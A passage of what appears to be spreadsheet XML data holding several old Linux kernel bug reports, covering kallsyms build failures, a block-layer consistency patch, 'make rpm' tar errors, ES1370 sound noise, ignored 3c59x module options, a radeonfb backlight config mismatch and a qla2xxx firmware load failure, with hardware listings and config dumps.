(for small systems) ---&gt; [ ] Do an extra kallsyms pass for it to work I had to (as recomended), enable "CONFIG_KALLSYMS_EXTRA_PASS" CONFIG_KALLSYMS_EXTRA_PASS: If kallsyms is not working correctly, the build will fail with inconsistent kallsyms data. If that occurs, log a bug report and turn on KALLSYMS_EXTRA_PASS which should result in a stable build. Always say N here unless you find a bug in kallsyms, which must be reported. KALLSYMS_EXTRA_PASS is only a temporary workaround while you wait for kallsyms to be fixed. So I did: [ ] Configure standard kernel features (for small systems) ---&gt; [*] Do an extra kallsyms pass ... and the kernel compiled fine :) My Details: I have a Duron 900 running slack 10.0 on a yet to successfully be compiled vanilla 2.6.10 kernel. # cat /proc/version Linux version 2.4.26 (root@tree) (gcc version 3.3.4) #6 Mon Jun 14 19:07:27 PDT 2004 # cat /proc/meminfo total: used: free: shared: buffers: cached: Mem: 320356352 287657984 32698368 0 23171072 207802368 Swap: 512745472 0 512745472 MemTotal: 312848 kB MemFree: 31932 kB MemShared: 0 kB Buffers: 22628 kB Cached: 202932 kB SwapCached: 0 kB Active: 62548 kB Inactive: 186508 kB HighTotal: 0 kB HighFree: 0 kB LowTotal: 312848 kB LowFree: 31932 kB SwapTotal: 500728 kB SwapFree: 500728 kB # cat /proc/cpuinfo processor : 0 vendor_id : AuthenticAMD cpu family : 6 model : 3 model name : AMD Duron(tm) Processor stepping : 1 cpu MHz : 896.823 cache size : 64 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 mmx fxsr syscall mmxext 3dnowext 3dnow bogomips : 1789.13 # lspci -vvv 00:00.0 Host bridge: Silicon Integrated Systems [SiS] 730 Host (rev 02) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 32 Region 0: Memory at d0000000 (32-bit, non-prefetchable) [size=64M] Capabilities: [c0] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3- Rate=x1,x2,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt; 00:00.1 IDE interface: Silicon Integrated Systems [SiS] 5513 [IDE] (rev d0) (prog-if 80 [Master]) Subsystem: Silicon Integrated Systems [SiS] SiS5513 EIDE Controller (A,B step) Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 16 Region 4: I/O ports at ff00 [size=16] 00:01.0 ISA bridge: Silicon Integrated Systems [SiS] SiS85C503/5513 (LPC Bridge) Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 00:01.1 Ethernet controller: Silicon Integrated Systems [SiS] SiS900 PCI Fast Ethernet (rev 82) Subsystem: Silicon Integrated Systems [SiS] SiS900 10/100 Ethernet Adapter Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (13000ns min, 2750ns max) Interrupt: pin C routed to IRQ 5 Region 0: I/O ports at d400 [size=256] Region 1: Memory at cfff7000 (32-bit, non-prefetchable) [size=4K] Expansion ROM at cffc0000 [disabled] [size=128K] Capabilities: [40] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=160mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:01.2 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 07) (prog-if 10 [OHCI]) Subsystem: Silicon Integrated Systems [SiS] USB 1.0 Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (20000ns max), cache line size 08 Interrupt: pin D routed to IRQ 11 Region 0: Memory at cfffc000 (32-bit, non-prefetchable) [size=4K] 00:01.3 USB Controller: Silicon Integrated Systems [SiS] USB 1.0 Controller (rev 07) (prog-if 10 [OHCI]) Subsystem: Silicon Integrated Systems [SiS] Onboard USB Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (20000ns max), cache line size 08 Interrupt: pin D routed to IRQ 11 Region 0: Memory at cfffd000 (32-bit, non-prefetchable) [size=4K] 00:01.4 Multimedia audio controller: Silicon Integrated Systems [SiS] SiS PCI Audio Accelerator (rev 02) Subsystem: Silicon Integrated Systems [SiS] SiS PCI Audio Accelerator Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (500ns min, 6000ns max) Interrupt: pin B routed to IRQ 10 Region 0: I/O ports at d800 [size=256] Region 1: Memory at cfffe000 (32-bit, non-prefetchable) [size=4K] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=55mA PME(D0-,D1-,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:02.0 PCI bridge: Silicon Integrated Systems [SiS] Virtual PCI-to-PCI bridge (AGP) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop+ ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 0000b000-0000bfff Memory behind bridge: cfe00000-cfefffff Prefetchable memory behind bridge: bfc00000-cfcfffff BridgeCtl: Parity- SERR+ NoISA+ VGA+ MAbort- &gt;Reset- FastB2B- 00:09.0 Ethernet controller: 3Com Corporation 3c905B 100BaseTX [Cyclone] (rev 64) Subsystem: 3Com Corporation 3C905B Fast Etherlink XL 10/100 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (2500ns min, 2500ns max), cache line size 08 Interrupt: pin A routed to IRQ 12 Region 0: I/O ports at d000 [size=128] Region 1: Memory at cfff6f80 (32-bit, non-prefetchable) [size=128] Expansion ROM at cffa0000 [disabled] [size=128K] Capabilities: [dc] Power Management version 1 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 01:00.0 VGA compatible controller: Silicon Integrated Systems [SiS] 630/730 PCI/AGP VGA Display Adapter (rev 31) (prog-if 00 [VGA]) Subsystem: Silicon Integrated Systems [SiS] 630/730 PCI/AGP VGA Display Adapter Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- BIST result: 00 Region 0: Memory at c0000000 (32-bit, prefetchable) [size=128M] Region 1: Memory at cfee0000 (32-bit, non-prefetchable) [size=128K] Region 2: I/O ports at bc00 [size=128] Capabilities: [40] Power Management version 1 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [50] AGP version 2.0 Status: RQ=16 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x1,x2,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt; =============================================================================================================</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution: Vanilla kernel Hardware Environment: N/A Software Environment: N/A Problem Description: In Documentation/block/biodoc.txt: ---------------------------------------------------------- i. Per-queue limits/values exported to the generic layer by the driver Various parameters that the generic i/o scheduler logic uses are set at a per-queue level (e.g maximum request size, maximum number of segments in a scatter-gather list, hardsect size) . . . There are blk_queue_xxx functions to set the parameters, rather than update the fields directly . . . blk_queue_max_sectors() blk_queue_max_phys_segments() blk_queue_max_hw_segments() ----------------------------------------------- In void blk_queue_make_request(request_queue_t * q, make_request_fn * mfn) { /* * set defaults */ q-&gt;nr_requests = BLKDEV_MAX_RQ; &gt;&gt;&gt; q-&gt;max_phys_segments = MAX_PHYS_SEGMENTS; &gt;&gt;&gt; q-&gt;max_hw_segments = MAX_HW_SEGMENTS; q-&gt;make_request_fn = mfn; q-&gt;backing_dev_info.ra_pages = (VM_MAX_READAHEAD * 1024) / PAGE_CACHE_SIZE; q-&gt;backing_dev_info.state = 0; q-&gt;backing_dev_info.memory_backed = 0; &gt;&gt;&gt; blk_queue_max_sectors(q, MAX_SECTORS); blk_queue_hardsect_size(q, 512); blk_queue_dma_alignment(q, 511); blk_queue_congestion_threshold(q); blk_queue_max_sectors is used appropriately, but max_phys_segments and max_hw_segments are updated directly. Not a big deal but it would be nice to have the code consistent (I think everywhere else uses blk_queue_max_phys_segments and blk_queue_max_hw_segments). The patch would be: --- linux-2.6.12.3-org/drivers/block/ll_rw_blk.c 2005-08-24 16:01:52.000000000 +0100 +++ linux-2.6.12.3/drivers/block/ll_rw_blk.c 2005-08-24 16:04:40.000000000 +0100 @@ -233,8 +233,8 @@ void blk_queue_make_request(request_queu * set defaults */ q-&gt;nr_requests = BLKDEV_MAX_RQ; - q-&gt;max_phys_segments = MAX_PHYS_SEGMENTS; - q-&gt;max_hw_segments = MAX_HW_SEGMENTS; + blk_queue_max_phys_segments(q, MAX_PHYS_SEGMENTS); + blk_queue_max_hw_segments(q, MAX_HW_SEGMENTS); q-&gt;make_request_fn = mfn; q-&gt;backing_dev_info.ra_pages = (VM_MAX_READAHEAD * 1024) / PAGE_CACHE_SIZE; q-&gt;backing_dev_info.state = 0; Steps to reproduce: N/A</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.22.9 Distribution: Hardware Environment: Software Environment: Problem Description: I have download the source of the last kernel. Decompress it. Give my old config and make config And finish by "make rpm" It is produce : (...) tar: kernel-2.6.22.9mic01/./drivers/ieee1394/Makefile: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/ieee1394/config_roms.c: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/ieee1394/ieee1394-ioctl.h: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/ieee1394/eth1394.h: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/dma: Cannot mkdir: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/dma/ioatdma_io.h: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/dma/Kconfig: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/dma/ioatdma_hw.h: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/dma/iovlock.c: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/dma/ioatdma_registers.h: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/dma/ioatdma.c: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/dma/ioatdma.h: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/dma/dmaengine.c: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/dma/Makefile: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/Makefile: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/pci: Cannot mkdir: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/pci/quirks.c: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/pci/setup-irq.c: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/pci/setup-res.c: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/pci/Kconfig: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/pci/probe.c: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/pci/search.c: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/pci/msi.c: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/pci/setup-bus.c: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/pci/proc.c: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/pci/syscall.c: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/pci/pci-acpi.c: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/pci/pci-driver.c: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/pci/bus.c: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/pci/pci.h: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/pci/pci-sysfs.c: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/pci/remove.c: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/pci/pcie: Cannot mkdir: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/pci/pcie/Kconfig: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/pci/pcie/aer: Cannot mkdir: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/pci/pcie/aer/aerdrv_acpi.c: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/pci/pcie/aer/aerdrv_core.c: Cannot open: No such file or directory tar: kernel-2.6.22.9mic01/./drivers/pci/pcie/aer/aerdrv_errprint.c: Cannot open: No such file or directory (...)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution: gentoo kernel versions: all 2.6.x versions alsa driver: all 1.0.x drivers, trying kernel included sources and external sources too. compilation: as module or as integrated too. cat .config |grep SND CONFIG_SND=m CONFIG_SND_TIMER=m CONFIG_SND_PCM=m CONFIG_SND_RAWMIDI=m CONFIG_SND_SEQUENCER=m CONFIG_SND_SEQ_DUMMY=m CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=m CONFIG_SND_PCM_OSS=m CONFIG_SND_SEQUENCER_OSS=y CONFIG_SND_RTCTIMER=m CONFIG_SND_ENS1370=m pci bus report: lspci -v 0000:00:00.0 Host bridge: Intel Corp. 440BX/ZX/DX - 82443BX/ZX/DX Host bridge (rev 03) Flags: bus master, medium devsel, latency 64 Memory at e0000000 (32-bit, prefetchable) Capabilities: [a0] AGP version 1.0 0000:00:01.0 PCI bridge: Intel Corp. 440BX/ZX/DX - 82443BX/ZX/DX AGP bridge (rev 03) (prog-if 00 [Normal decode]) Flags: bus master, 66Mhz, medium devsel, latency 64 Bus: primary=00, secondary=01, subordinate=01, sec-latency=64 I/O behind bridge: 0000d000-0000dfff Memory behind bridge: db000000-dbefffff Prefetchable memory behind bridge: dbf00000-dfffffff Expansion ROM at 0000d000 [disabled] [size=4K] 0000:00:04.0 ISA bridge: Intel Corp. 82371AB/EB/MB PIIX4 ISA (rev 02) Flags: bus master, medium devsel, latency 0 0000:00:04.1 IDE interface: Intel Corp. 82371AB/EB/MB PIIX4 IDE (rev 01) (prog-if 80 [Master]) Flags: bus master, medium devsel, latency 32 I/O ports at b800 [size=16] 0000:00:04.2 USB Controller: Intel Corp. 82371AB/EB/MB PIIX4 USB (rev 01) (prog-if 00 [UHCI]) Flags: bus master, medium devsel, latency 32, IRQ 11 I/O ports at b400 [size=32] 0000:00:04.3 Bridge: Intel Corp. 82371AB/EB/MB PIIX4 ACPI (rev 02) Flags: medium devsel, IRQ 9 0000:00:0b.0 Multimedia audio controller: Ensoniq ES1370 [AudioPCI] (rev 01) Subsystem: Unknown device 4942:4c4c Flags: bus master, slow devsel, latency 32, IRQ 10 I/O ports at b000 0000:01:00.0 VGA compatible controller: ATI Technologies Inc Rage 128 RF/SG AGP (prog-if 00 [VGA]) Subsystem: ATI Technologies Inc Rage Fury/Xpert 128/Xpert 2000 Flags: bus master, stepping, 66Mhz, medium devsel, latency 64, IRQ 11 Memory at dc000000 (32-bit, prefetchable) I/O ports at d800 [size=256] Memory at db000000 (32-bit, non-prefetchable) [size=16K] Capabilities: [50] AGP version 2.0 Capabilities: [5c] Power Management version 1 Problem Description: with 2.4.2x alsa drivers worked so good. now when i play sound, with every player, mplayer, xmms, kde stuff and so on.. i got a bad sound, with flicks, rumors and so on. i see that the noises are even worse when my secondary hard disk is used (ex. when playing a divs from that hd). disabling dma on that hark disk seems to reduce pretty to 0 the problem. i repeat i has this problem since i used 2.6.x kernel while 2.4.x worked good with a clean sound. Not a hardware problem cause in Windows or old kernel it still work good. as you can seem system reconizes my sound card as 1370. i tried 1371 module but it didn't work at all. so actually no solution.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17 Distribution: Debian Etch Hardware Environment: i386 Software Environment: Problem Description: With kmod enabled the 3c59x module is loaded, but it's options (enable_wol=1) are ignored. Manually reloading the module afterwards works fine, as does disabling kmod and loading 3c59x via for instance /etc/modules. This behaviour seems to have been caused by the latest patches to kmod.c, since a recompilation with 2.6.17's kmod.c fixes the problem. I am not sure if this affects other modules as well. Steps to reproduce: In your config enable kmod and configure the 3c59x driver as a module. Define options for 3c59x in some file in /etc/modprobe.d/.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: ATI Technologies Inc RS300M AGP [Radeon Mobility 9100IGP] Problem Description: In the radeon framebuffer driver, drivers/video/aty/radeon_base.c CONFIG_PMAC_BACKLIGHT is used to enable/disable backlight support. But in the config file generated by 'menuconfig', CONFIG_FB_RADEON_BACKLIGHT is used for this purpose, PMAC is for Macintosh. This mismatch prevents compilation of radeonfb without backlight support. The exact lines from Linux Torvalds' git tree as of now drivers/video/aty/radeon_base.c: 279 #ifdef CONFIG_PMAC_BACKLIGHT 280 static int backlight = 1; 281 #else 282 static int backlight = 0; 283 #endif Should be 279 #ifdef CONFIG_FB_RADEON_BACKLIGHT I tested a kernel build with this change applied.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Distribution: Debian etch (stable) Hardware Environment: IBM eServer xSeries 346 IBM TotalStorage DS400 QLogic QLA2340. ISP2312 FC2-133 PCI-X Host Bus Adapter Problem Description: qla2xxx.ko module in 2.6.26.5 kernel compilation can't load firmware image. The same with 2.6.24.5 kernel. syslog: Sep 25 13:08:12 ameba kernel: [72135.535325] QLogic Fibre Channel HBA Driver: 8.02.01-k4 Sep 25 13:08:12 ameba kernel: [72135.535325] ACPI: PCI Interrupt 0000:04:04.0[A] -&gt; GSI 96 (level, low) -&gt; IRQ 64 Sep 25 13:08:12 ameba kernel: [72135.535325] qla2xxx 0000:04:04.0: Found an ISP2312, irq 64, iobase 0xf8d8c000 Sep 25 13:08:12 ameba kernel: [72135.535325] qla2xxx 0000:04:04.0: Configuring PCI space... Sep 25 13:08:12 ameba kernel: [72135.535325] qla2xxx 0000:04:04.0: Configure NVRAM parameters... Sep 25 13:08:12 ameba kernel: [72135.626298] qla2xxx 0000:04:04.0: Verifying loaded RISC code... Sep 25 13:08:12 ameba kernel: [72135.637331] firmware: requesting ql2300_fw.bin Sep 25 13:08:22 ameba kernel: [72145.634358] qla2xxx 0000:04:04.0: Firmware image unavailable. Sep 25 13:08:22 ameba kernel: [72145.634389] qla2xxx 0000:04:04.0: Firmware images can be retrieved from: ftp://ftp.qlogic.com/outgoing/linux/firmware/. Sep 25 13:08:22 ameba kernel: [72145.634443] qla2xxx 0000:04:04.0: Failed to initialize adapter Sep 25 13:08:22 ameba kernel: [72145.635205] ACPI: PCI interrupt for device 0000:04:04.0 disabled ameba:/home/nierka# ls -alh /lib/firmware/ total 616K drwxr-xr-x 2 root root 208 2008-09-24 17:12 . drwxr-xr-x 12 root root 3.8K 2008-09-24 17:14 .. -rw-r--r-- 1 root root 76K 2006-05-28 17:13 ql2100_fw.bin -rw-r--r-- 1 root root 83K 2006-05-28 17:13 ql2200_fw.bin -rw-r--r-- 1 root root 121K 2006-05-28 17:13 ql2300_fw.bin -rw-r--r-- 1 root root 130K 2006-05-28 17:13 ql2322_fw.bin -rw-r--r-- 1 root root 196K 2006-05-28 17:13 ql2400_fw.bin ameba:/home/nierka# Kernel config: # # Automatically generated make config: don't edit # Linux kernel version: 2.6.26.5 # Wed Sep 24 16:57:53 2008 # # CONFIG_64BIT is not set CONFIG_X86_32=y # CONFIG_X86_64 is not set CONFIG_X86=y CONFIG_ARCH_DEFCONFIG="arch/x86/configs/i386_defconfig" # CONFIG_GENERIC_LOCKBREAK is not set CONFIG_GENERIC_TIME=y CONFIG_GENERIC_CMOS_UPDATE=y CONFIG_CLOCKSOURCE_WATCHDOG=y CONFIG_GENERIC_CLOCKEVENTS=y CONFIG_GENERIC_CLOCKEVENTS_BROADCAST=y CONFIG_LOCKDEP_SUPPORT=y CONFIG_STACKTRACE_SUPPORT=y CONFIG_HAVE_LATENCYTOP_SUPPORT=y CONFIG_FAST_CMPXCHG_LOCAL=y CONFIG_MMU=y CONFIG_ZONE_DMA=y CONFIG_GENERIC_ISA_DMA=y CONFIG_GENERIC_IOMAP=y CONFIG_GENERIC_BUG=y CONFIG_GENERIC_HWEIGHT=y # CONFIG_GENERIC_GPIO is not set CONFIG_ARCH_MAY_HAVE_PC_FDC=y # CONFIG_RWSEM_GENERIC_SPINLOCK is not set CONFIG_RWSEM_XCHGADD_ALGORITHM=y # CONFIG_ARCH_HAS_ILOG2_U32 is not set # CONFIG_ARCH_HAS_ILOG2_U64 is not set CONFIG_ARCH_HAS_CPU_IDLE_WAIT=y CONFIG_GENERIC_CALIBRATE_DELAY=y # CONFIG_GENERIC_TIME_VSYSCALL is not set CONFIG_ARCH_HAS_CPU_RELAX=y CONFIG_ARCH_HAS_CACHE_LINE_SIZE=y CONFIG_HAVE_SETUP_PER_CPU_AREA=y # CONFIG_HAVE_CPUMASK_OF_CPU_MAP is not set CONFIG_ARCH_HIBERNATION_POSSIBLE=y CONFIG_ARCH_SUSPEND_POSSIBLE=y # CONFIG_ZONE_DMA32 is not set CONFIG_ARCH_POPULATES_NODE_MAP=y # CONFIG_AUDIT_ARCH is not set CONFIG_ARCH_SUPPORTS_AOUT=y CONFIG_ARCH_SUPPORTS_OPTIMIZED_INLINING=y CONFIG_GENERIC_HARDIRQS=y CONFIG_GENERIC_IRQ_PROBE=y CONFIG_GENERIC_PENDING_IRQ=y CONFIG_X86_SMP=y CONFIG_X86_32_SMP=y CONFIG_X86_HT=y CONFIG_X86_BIOS_REBOOT=y CONFIG_X86_TRAMPOLINE=y CONFIG_KTIME_SCALAR=y CONFIG_DEFCONFIG_LIST="/lib/modules/$UNAME_RELEASE/.config" # # General setup # CONFIG_EXPERIMENTAL=y CONFIG_LOCK_KERNEL=y CONFIG_INIT_ENV_ARG_LIMIT=32 CONFIG_LOCALVERSION="" CONFIG_LOCALVERSION_AUTO=y CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_SYSVIPC_SYSCTL=y # CONFIG_POSIX_MQUEUE is not set # CONFIG_BSD_PROCESS_ACCT is not set # CONFIG_TASKSTATS is not set # CONFIG_AUDIT is not set CONFIG_IKCONFIG=y CONFIG_IKCONFIG_PROC=y CONFIG_LOG_BUF_SHIFT=15 # CONFIG_CGROUPS is not set CONFIG_HAVE_UNSTABLE_SCHED_CLOCK=y # CONFIG_GROUP_SCHED is not set # CONFIG_SYSFS_DEPRECATED_V2 is not set # CONFIG_RELAY is not set CONFIG_NAMESPACES=y # CONFIG_UTS_NS is not set # CONFIG_IPC_NS is not set # CONFIG_USER_NS is not set # CONFIG_PID_NS is not set # CONFIG_BLK_DEV_INITRD is not set # CONFIG_CC_OPTIMIZE_FOR_SIZE is not set CONFIG_SYSCTL=y # CONFIG_EMBEDDED is not set CONFIG_UID16=y CONFIG_SYSCTL_SYSCALL=y CONFIG_SYSCTL_SYSCALL_CHECK=y CONFIG_KALLSYMS=y # CONFIG_KALLSYMS_EXTRA_PASS is not set CONFIG_HOTPLUG=y CONFIG_PRINTK=y CONFIG_BUG=y CONFIG_ELF_CORE=y CONFIG_PCSPKR_PLATFORM=y # CONFIG_COMPAT_BRK is not set CONFIG_BASE_FULL=y CONFIG_FUTEX=y CONFIG_ANON_INODES=y CONFIG_EPOLL=y CONFIG_SIGNALFD=y CONFIG_TIMERFD=y CONFIG_EVENTFD=y CONFIG_SHMEM=y CONFIG_VM_EVENT_COUNTERS=y CONFIG_SLAB=y # CONFIG_SLUB is not set # CONFIG_SLOB is not set CONFIG_PROFILING=y # CONFIG_MARKERS is not set CONFIG_OPROFILE=y CONFIG_HAVE_OPROFILE=y # CONFIG_KPROBES is not set CONFIG_HAVE_KPROBES=y CONFIG_HAVE_KRETPROBES=y # CONFIG_HAVE_DMA_ATTRS is not set CONFIG_PROC_PAGE_MONITOR=y CONFIG_SLABINFO=y CONFIG_RT_MUTEXES=y # CONFIG_TINY_SHMEM is not set CONFIG_BASE_SMALL=0 CONFIG_MODULES=y # CONFIG_MODULE_FORCE_LOAD is not set CONFIG_MODULE_UNLOAD=y CONFIG_MODULE_FORCE_UNLOAD=y CONFIG_MODVERSIONS=y # CONFIG_MODULE_SRCVERSION_ALL is not set CONFIG_KMOD=y CONFIG_STOP_MACHINE=y CONFIG_BLOCK=y # CONFIG_LBD is not set # CONFIG_BLK_DEV_IO_TRACE is not set # CONFIG_LSF is not set # CONFIG_BLK_DEV_BSG is not set # # IO Schedulers # CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y CONFIG_IOSCHED_CFQ=y # CONFIG_DEFAULT_AS is not set # CONFIG_DEFAULT_DEADLINE is not set CONFIG_DEFAULT_CFQ=y # CONFIG_DEFAULT_NOOP is not set CONFIG_DEFAULT_IOSCHED="cfq" CONFIG_CLASSIC_RCU=y # # Processor type and features # # CONFIG_TICK_ONESHOT is not set # CONFIG_NO_HZ is not set # CONFIG_HIGH_RES_TIMERS is not set CONFIG_GENERIC_CLOCKEVENTS_BUILD=y CONFIG_SMP=y CONFIG_X86_PC=y # CONFIG_X86_ELAN is not set # CONFIG_X86_VOYAGER is not set # CONFIG_X86_NUMAQ is not set # CONFIG_X86_SUMMIT is not set # CONFIG_X86_BIGSMP is not set # CONFIG_X86_VISWS is not set # CONFIG_X86_GENERICARCH is not set # CONFIG_X86_ES7000 is not set # CONFIG_X86_RDC321X is not set # CONFIG_X86_VSMP is not set # CONFIG_SCHED_NO_NO_OMIT_FRAME_POINTER is not set # CONFIG_PARAVIRT_GUEST is not set # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMII is not set # CONFIG_MPENTIUMIII is not set # CONFIG_MPENTIUMM is not set CONFIG_MPENTIUM4=y # CONFIG_MK6 is not set # CONFIG_MK7 is not set # CONFIG_MK8 is not set # CONFIG_MCRUSOE is not set # CONFIG_MEFFICEON is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MGEODEGX1 is not set # CONFIG_MGEODE_LX is not set # CONFIG_MCYRIXIII is not set # CONFIG_MVIAC3_2 is not set # CONFIG_MVIAC7 is not set # CONFIG_MPSC is not set # CONFIG_MCORE2 is not set # CONFIG_GENERIC_CPU is not set # CONFIG_X86_GENERIC is not set CONFIG_X86_CPU=y CONFIG_X86_CMPXCHG=y CONFIG_X86_L1_CACHE_SHIFT=7 CONFIG_X86_XADD=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_P6_NOP=y CONFIG_X86_TSC=y CONFIG_X86_CMOV=y CONFIG_X86_MINIMUM_CPU_FAMILY=6 